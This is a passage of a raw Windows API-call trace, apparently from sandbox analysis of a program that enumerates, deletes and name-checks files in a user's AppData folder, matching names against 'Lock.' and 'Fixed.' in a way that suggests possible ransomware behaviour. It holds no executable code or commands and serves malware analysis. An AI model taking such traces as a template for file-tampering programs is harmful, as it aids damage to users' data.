dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0195.822] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8e) returned 0x2420898 [0195.822] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/bXPQ0g368kO FpGH2kMH.gif", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\bXPQ0g368kO FpGH2kMH.gif", lpFilePart=0x8bedfc*="bXPQ0g368kO FpGH2kMH.gif") returned 0x46 [0195.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0195.822] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\bXPQ0g368kO FpGH2kMH.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bxpq0g368ko fpgh2kmh.gif")) returned 0x2020 [0195.822] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\bXPQ0g368kO FpGH2kMH.gif", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52104100, ftCreationTime.dwHighDateTime=0x1d4c566, ftLastAccessTime.dwLowDateTime=0x40d543c0, ftLastAccessTime.dwHighDateTime=0x1d4cdb5, ftLastWriteTime.dwLowDateTime=0x40d543c0, ftLastWriteTime.dwHighDateTime=0x1d4cdb5, nFileSizeHigh=0x0, nFileSizeLow=0x129d0, dwReserved0=0x903, dwReserved1=0x4, cFileName="bXPQ0g368kO FpGH2kMH.gif", cAlternateFileName="BXPQ0G~1.GIF")) returned 0xaa57a0 [0195.822] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\bXPQ0g368kO FpGH2kMH.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bxpq0g368ko fpgh2kmh.gif")) returned 1 [0195.823] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52104100, ftCreationTime.dwHighDateTime=0x1d4c566, ftLastAccessTime.dwLowDateTime=0x40d543c0, ftLastAccessTime.dwHighDateTime=0x1d4cdb5, ftLastWriteTime.dwLowDateTime=0x40d543c0, ftLastWriteTime.dwHighDateTime=0x1d4cdb5, nFileSizeHigh=0x0, nFileSizeLow=0x129d0, dwReserved0=0x903, dwReserved1=0x4, cFileName="bXPQ0g368kO FpGH2kMH.gif", cAlternateFileName="BXPQ0G~1.GIF")) returned 0 [0195.823] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0195.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0195.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0195.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0195.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0195.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0195.824] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0195.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0195.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0195.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0195.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0195.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0195.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0195.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0195.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0195.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0195.824] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0195.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0195.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0195.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0195.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0195.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0195.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa260 [0195.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0195.825] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0195.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0195.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0195.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0195.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0195.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0195.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0195.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0195.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0195.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0195.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0195.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0195.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0195.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0195.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0195.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0195.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0195.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0195.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0195.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0195.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0195.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0195.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0195.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0195.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0195.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0195.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0195.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0195.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0195.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0195.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0195.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0195.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0195.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0195.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0195.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0195.827] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8e) returned 0x2420898 [0195.827] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/bXPQ0g368kO FpGH2kMH.gif", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\bXPQ0g368kO FpGH2kMH.gif", lpFilePart=0x8bf658*="bXPQ0g368kO FpGH2kMH.gif") returned 0x46 [0195.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0195.827] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\bXPQ0g368kO FpGH2kMH.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bxpq0g368ko fpgh2kmh.gif")) returned 0xffffffff [0195.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0195.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0195.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0195.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0195.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0195.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0195.827] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.827] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0195.827] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.827] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0195.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0195.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0195.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0195.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0195.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0195.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0195.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0195.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0195.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0195.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0195.828] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0195.828] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0195.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="co6M9Umeg.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o6M9Umeg.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0195.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6M9Umeg.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9Umeg.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0195.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9Umeg.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Umeg.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0195.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meg.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0195.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eg.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g.jpg", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0195.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0195.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0195.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0195.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0195.829] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0195.829] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0195.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0195.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0195.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0195.829] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0195.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="co6M9Umeg.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0195.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o6M9Umeg.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6M9Umeg.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0195.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9Umeg.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9Umeg.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0195.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Umeg.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meg.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0195.830] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eg.jpg", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0195.830] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0195.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0195.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0195.830] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0195.830] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0195.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0195.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0195.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9b88 [0195.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0195.830] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0195.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0195.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0195.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0195.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0195.830] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0195.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0195.830] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0195.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0195.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0195.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0195.831] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0195.831] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.831] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0195.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0195.831] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0195.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0195.831] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0195.831] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.831] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0195.831] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/co6M9Umeg.jpg", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfecc2f10, ftCreationTime.dwHighDateTime=0x1d4d4f4, ftLastAccessTime.dwLowDateTime=0x121975c0, ftLastAccessTime.dwHighDateTime=0x1d4c91d, ftLastWriteTime.dwLowDateTime=0x121975c0, ftLastWriteTime.dwHighDateTime=0x1d4c91d, nFileSizeHigh=0x0, nFileSizeLow=0x8aa4, dwReserved0=0xa130039, dwReserved1=0x11f3f, cFileName="co6M9Umeg.jpg", cAlternateFileName="CO6M9U~1.JPG")) returned 0xaa57a0 [0195.832] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0195.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0195.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0195.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.832] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0195.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0195.832] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.832] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0195.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0195.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0195.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0195.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0195.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0195.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0195.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0195.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0195.833] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0195.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0195.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0195.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0195.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.833] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0195.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0195.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.834] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.834] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, 